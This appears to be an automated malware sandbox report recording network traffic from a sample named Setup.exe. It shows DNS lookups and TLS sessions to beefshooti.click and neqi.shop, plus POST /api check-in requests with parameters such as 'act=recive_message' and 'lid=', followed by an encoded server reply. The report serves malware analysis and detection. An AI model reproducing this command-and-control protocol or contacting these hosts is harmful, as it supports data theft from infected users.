                                                                                                                    Dec 24, 2024 01:12:19.532983065 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.533009052 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.540852070 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.540918112 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.540930033 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.540976048 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.541136980 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.541173935 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.541198969 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.541215897 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.775156975 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.775227070 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.775326014 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.775906086 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.775926113 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:20.987673998 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:20.987785101 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:20.989682913 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:20.989713907 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:20.989969015 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:20.991607904 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:20.991977930 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:20.992038965 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:20.992109060 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:20.992125988 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:22.279207945 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:22.279269934 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:22.279331923 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:22.279475927 CET49732443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:22.279498100 CET44349732104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:22.494121075 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:22.494170904 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:22.494252920 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:22.494573116 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:22.494590044 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:23.709280014 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:23.709376097 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:23.710572958 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:23.710598946 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:23.710835934 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:23.711915016 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:23.712033987 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:23.712075949 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:24.576316118 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:24.576402903 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:24.576462030 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:24.577353954 CET49734443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:24.577399969 CET44349734104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:25.206831932 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:25.206856966 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:25.206918955 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:25.207277060 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:25.207288027 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:26.423213959 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:26.423290968 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:26.424520969 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:26.424527884 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:26.424762964 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:26.431282043 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:26.431397915 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:26.431428909 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:26.431488991 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:26.431494951 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:27.412266970 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:27.412357092 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:27.412434101 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:27.449170113 CET49738443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:27.449184895 CET44349738104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:28.132872105 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:28.132905006 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:28.132992029 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:28.133296967 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:28.133316994 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:29.474338055 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:29.474433899 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:29.475505114 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:29.475533009 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:29.475769997 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:29.484091043 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:29.484158039 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:29.484174013 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:30.279701948 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:30.279794931 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:30.280008078 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.280008078 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.384543896 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.384612083 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:30.384721994 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.385082960 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.385133028 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:30.594530106 CET49740443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:30.594571114 CET44349740104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:31.599113941 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:31.599206924 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:31.600414991 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:31.600438118 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:31.600655079 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:31.612008095 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:31.612113953 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:31.612128019 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:32.277230024 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:32.277285099 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:32.277363062 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:32.277627945 CET49742443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:32.277662039 CET44349742104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:32.330996037 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:32.331073046 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:32.331195116 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:32.331598043 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:32.331648111 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:33.567720890 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:33.567800999 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:33.569417000 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:33.569436073 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:33.569644928 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:33.570832968 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:33.570873022 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:33.570904016 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.346568108 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.346626997 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.346716881 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:34.347031116 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:34.347031116 CET49743443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:34.347064972 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.347131968 CET44349743104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.493489027 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:34.493515015 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.493606091 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:34.494054079 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:34.494064093 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:35.867929935 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:35.868046045 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:35.872976065 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:35.872982979 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:35.873250961 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:35.874869108 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:35.915383101 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:36.494803905 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:36.494848013 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:36.495192051 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:36.495328903 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:36.495338917 CET44349744104.21.27.229192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:36.495368958 CET49744443192.168.2.4104.21.27.229
                                                                                                                    Dec 24, 2024 01:12:36.495373964 CET44349744104.21.27.229192.168.2.4
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 24, 2024 01:12:14.984447002 CET5790653192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 01:12:15.300973892 CET53579061.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:34.350322962 CET5423953192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 01:12:34.492738962 CET53542391.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:36.519490957 CET5354453192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 01:12:36.736624956 CET53535441.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 24, 2024 01:12:14.984447002 CET192.168.2.41.1.1.10x84cfStandard query (0)beefshooti.clickA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:34.350322962 CET192.168.2.41.1.1.10xda30Standard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:36.519490957 CET192.168.2.41.1.1.10x627cStandard query (0)klipcatepiu0.shopA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 24, 2024 01:12:15.300973892 CET1.1.1.1192.168.2.40x84cfNo error (0)beefshooti.click104.21.18.185A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:15.300973892 CET1.1.1.1192.168.2.40x84cfNo error (0)beefshooti.click172.67.183.30A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:34.492738962 CET1.1.1.1192.168.2.40xda30No error (0)neqi.shop104.21.27.229A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:34.492738962 CET1.1.1.1192.168.2.40xda30No error (0)neqi.shop172.67.169.205A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 01:12:36.736624956 CET1.1.1.1192.168.2.40x627cName error (3)klipcatepiu0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    • beefshooti.click
                                                                                                                    • neqi.shop
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449730104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:16 UTC263OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-12-24 00:12:17 UTC1121INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:17 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=jokvc5810e0g8uub8fci7mepmi; expires=Fri, 18 Apr 2025 17:58:56 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4g5kQ38QwQiI1chA6EBvSPUe3ZdrxjsfdPEF3mL7LkI5hyPZ7Y09JFUMwbUe%2BmIUqJfg88AQfHryvQKZ9mOmQ%2BZxK1P1n3V%2FmXzHJgdZuT7GEp2efqsBG49HjUKK5o7olzO"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c60fd0eea0f9f-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1487&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1918528&cwnd=213&unsent_bytes=0&cid=3cc8c64932c1c23c&ts=770&x=0"
                                                                                                                    2024-12-24 00:12:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                    Data Ascii: 2ok
                                                                                                                    2024-12-24 00:12:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449731104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:18 UTC264OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 79
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:18 UTC79OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--BARNI&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                                    2024-12-24 00:12:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:19 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=65i2f5ogss1ul4jmlr4n684g8f; expires=Fri, 18 Apr 2025 17:58:58 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIYep%2BO2Qe2y%2Fze7j5qEt4Bk1RHC7EnNS9QUbOzYookQqL%2BlYXEqO%2BKazTO7IhBUzeg0xC3L4DeXRDgeG0Q6d8e%2Bl0%2FB%2B7e1SuiXz6RNRpVPBgtM7FIE2ToQfLeQW954uHXJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c6109cd428c60-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=8021&min_rtt=2650&rtt_var=4449&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=979&delivery_rate=1101886&cwnd=67&unsent_bytes=0&cid=85bd5c0407d13a50&ts=769&x=0"
                                                                                                                    2024-12-24 00:12:19 UTC240INData Raw: 31 63 62 32 0d 0a 70 63 2f 6e 55 65 32 70 66 51 59 68 75 43 6a 49 54 54 32 70 32 79 4b 72 53 66 6c 44 58 4b 7a 5a 78 6d 36 31 6b 45 4f 55 66 30 4c 65 37 5a 46 7a 31 35 31 52 4a 46 4c 64 43 76 49 72 58 4d 57 6f 52 34 64 72 6d 43 64 2b 6c 72 2b 6e 41 73 62 31 62 37 59 4a 4c 34 66 31 67 54 43 42 32 68 67 71 41 39 31 51 36 6e 64 6d 30 76 6c 48 78 57 76 44 59 54 6e 47 75 36 63 43 31 2f 45 6f 2b 77 38 75 78 71 65 4c 4e 6f 58 4d 48 6d 4a 41 31 45 57 74 4b 46 6a 49 73 55 7a 43 4a 4a 45 75 66 6f 44 37 6f 78 53 58 71 6d 48 5a 47 6a 62 45 67 6f 59 69 68 6f 73 41 4b 6c 71 61 54 61 5a 76 42 34 75 36 52 38 6b 6c 6e 79 63 33 78 4c 47 75 43 74 62 30 4b 65 51 57 4a 4d 32 6e 68 54 57 45 78 68 64 32 54 64 35 43 70 69 35 53 79 50
                                                                                                                    Data Ascii: 1cb2pc/nUe2pfQYhuCjITT2p2yKrSflDXKzZxm61kEOUf0Le7ZFz151RJFLdCvIrXMWoR4drmCd+lr+nAsb1b7YJL4f1gTCB2hgqA91Q6ndm0vlHxWvDYTnGu6cC1/Eo+w8uxqeLNoXMHmJA1EWtKFjIsUzCJJEufoD7oxSXqmHZGjbEgoYihosAKlqaTaZvB4u6R8klnyc3xLGuCtb0KeQWJM2nhTWExhd2Td5Cpi5SyP
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 6b 4f 69 53 79 44 59 57 61 4f 36 4a 59 50 78 75 4d 30 2b 77 30 6d 68 37 4c 4c 4b 73 2f 4d 45 79 51 62 6d 6b 4b 6d 49 56 72 49 74 6b 66 49 4b 34 6b 75 50 73 32 7a 72 41 6a 64 2f 53 37 35 45 79 72 41 70 59 77 30 67 4d 77 58 59 6b 7a 5a 43 75 52 76 57 4e 50 35 47 49 6b 4c 69 79 49 39 32 72 61 31 54 4d 69 38 4f 4c 59 61 4c 49 66 31 78 54 57 42 79 68 4a 6b 55 64 4a 42 6f 53 70 4e 77 4c 42 4e 78 43 75 57 4b 7a 48 4e 75 36 4d 47 33 66 30 72 38 68 41 74 77 61 32 46 63 38 47 4c 47 48 77 44 67 67 71 4a 4b 6b 2f 4d 74 56 61 4c 45 64 73 2b 63 4e 66 37 6f 77 43 58 71 6d 48 2b 47 43 50 45 70 6f 6f 77 68 38 41 4e 5a 46 48 63 52 36 38 39 57 63 36 33 53 73 6f 35 6b 53 38 34 7a 62 4b 76 42 64 4c 31 4a 62 5a 54 59 4d 43 31 78 57 76 50 36 68 4a 76 54 39 42 64 71 6d 39 41 68
                                                                                                                    Data Ascii: kOiSyDYWaO6JYPxuM0+w0mh7LLKs/MEyQbmkKmIVrItkfIK4kuPs2zrAjd/S75EyrApYw0gMwXYkzZCuRvWNP5GIkLiyI92ra1TMi8OLYaLIf1xTWByhJkUdJBoSpNwLBNxCuWKzHNu6MG3f0r8hAtwa2Fc8GLGHwDggqJKk/MtVaLEds+cNf7owCXqmH+GCPEpoowh8ANZFHcR689Wc63Sso5kS84zbKvBdL1JbZTYMC1xWvP6hJvT9Bdqm9Ah
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 35 6c 79 73 34 77 62 61 6f 54 4a 6d 79 4a 75 35 64 65 49 65 48 68 69 65 4d 77 56 31 52 51 4e 52 45 72 54 6b 66 31 50 64 5a 69 53 79 58 59 57 61 4f 74 71 55 45 30 65 41 75 2b 78 34 75 79 61 4b 41 50 49 66 4c 48 32 6c 47 33 6b 47 68 4c 46 4c 50 71 30 72 4a 49 35 34 67 4e 4d 54 37 36 6b 7a 51 36 6d 47 75 58 52 48 51 70 73 63 47 6a 4d 55 52 59 31 57 61 56 65 51 32 48 38 79 31 41 4a 46 72 6c 69 6b 37 79 37 53 6c 42 74 6e 33 4b 2f 6f 56 4c 73 53 2f 69 6a 65 50 78 78 64 75 54 74 52 4f 6f 69 5a 55 77 4c 39 41 79 43 48 62 62 33 37 4a 6f 2b 52 55 6c 38 59 6d 2b 68 41 76 68 5a 69 47 50 59 48 4d 43 53 52 63 6c 46 50 71 4b 46 4f 4c 34 51 44 46 49 70 73 71 4e 4d 71 37 6f 77 48 53 38 53 62 31 45 43 66 4e 6f 34 49 33 67 38 49 53 59 6b 50 64 54 71 38 39 57 73 4b 31 54 49
                                                                                                                    Data Ascii: 5lys4wbaoTJmyJu5deIeHhieMwV1RQNRErTkf1PdZiSyXYWaOtqUE0eAu+x4uyaKAPIfLH2lG3kGhLFLPq0rJI54gNMT76kzQ6mGuXRHQpscGjMURY1WaVeQ2H8y1AJFrlik7y7SlBtn3K/oVLsS/ijePxxduTtROoiZUwL9AyCHbb37Jo+RUl8Ym+hAvhZiGPYHMCSRclFPqKFOL4QDFIpsqNMq7owHS8Sb1ECfNo4I3g8ISYkPdTq89WsK1TI
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 66 74 48 31 76 55 7a 51 2f 6d 47 75 58 53 6e 4f 76 34 73 39 68 73 59 5a 62 45 54 55 52 36 45 70 56 4d 79 2b 52 73 51 6a 6c 69 51 39 7a 37 2b 75 48 74 54 35 4b 2f 73 58 59 49 6e 74 67 69 76 50 6b 31 39 44 54 2f 4e 61 73 54 31 4a 69 36 59 4f 30 47 75 63 4c 58 36 57 2b 36 63 44 33 76 30 70 2f 68 49 76 77 36 4f 44 4e 59 4c 4f 45 47 35 52 30 6b 53 6e 4a 46 44 41 71 30 44 45 4c 35 63 6c 4e 73 57 78 35 45 4b 58 39 54 6d 32 52 57 44 79 6f 49 6f 7a 6a 4e 31 66 65 77 33 44 43 71 30 6a 48 35 50 35 54 4d 63 72 6c 43 30 79 78 62 4f 6c 41 4e 6e 31 4a 50 38 56 4b 4e 57 73 67 54 75 4f 78 52 42 6c 52 39 39 50 72 69 68 62 7a 62 59 41 68 32 75 63 4f 58 36 57 2b 34 73 72 34 72 41 41 7a 46 30 2f 69 62 54 46 4e 49 4f 4c 52 79 52 50 32 55 61 69 49 46 6e 43 74 55 72 41 49 4a 63
                                                                                                                    Data Ascii: ftH1vUzQ/mGuXSnOv4s9hsYZbETUR6EpVMy+RsQjliQ9z7+uHtT5K/sXYIntgivPk19DT/NasT1Ji6YO0GucLX6W+6cD3v0p/hIvw6ODNYLOEG5R0kSnJFDAq0DEL5clNsWx5EKX9Tm2RWDyoIozjN1few3DCq0jH5P5TMcrlC0yxbOlANn1JP8VKNWsgTuOxRBlR99PrihbzbYAh2ucOX6W+4sr4rAAzF0/ibTFNIOLRyRP2UaiIFnCtUrAIJc
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 4b 41 4a 32 50 4d 67 38 41 38 6e 7a 72 2b 4c 50 6f 44 44 46 32 31 43 33 6b 2b 6e 4b 56 50 42 75 45 66 48 4a 5a 4e 68 63 49 36 38 76 45 79 50 73 67 44 6d 42 6a 4c 52 6f 4b 51 2b 67 49 73 41 4b 6c 71 61 54 61 5a 76 42 34 75 77 55 73 30 6d 69 53 67 35 77 4c 53 6e 48 74 62 2f 4b 75 51 61 4c 38 4f 71 69 54 57 41 7a 52 35 68 53 64 5a 4e 72 79 52 51 78 2f 6b 4f 69 53 79 44 59 57 61 4f 6c 61 38 66 77 50 45 76 2f 51 73 37 68 37 4c 4c 4b 73 2f 4d 45 79 51 62 6d 6b 6d 68 4a 46 76 4c 74 55 44 4e 4a 70 73 7a 4d 63 6d 38 72 51 66 46 2b 43 62 78 46 69 6a 4d 6f 6f 4d 68 67 38 55 4e 59 56 48 49 43 75 52 76 57 4e 50 35 47 49 6b 64 6e 44 45 75 7a 66 6d 56 47 74 54 6b 4b 76 73 52 59 4e 6a 6a 6e 48 4f 49 78 31 38 38 41 39 78 46 6f 79 78 51 79 72 42 4d 78 43 36 53 4a 44 2f 49
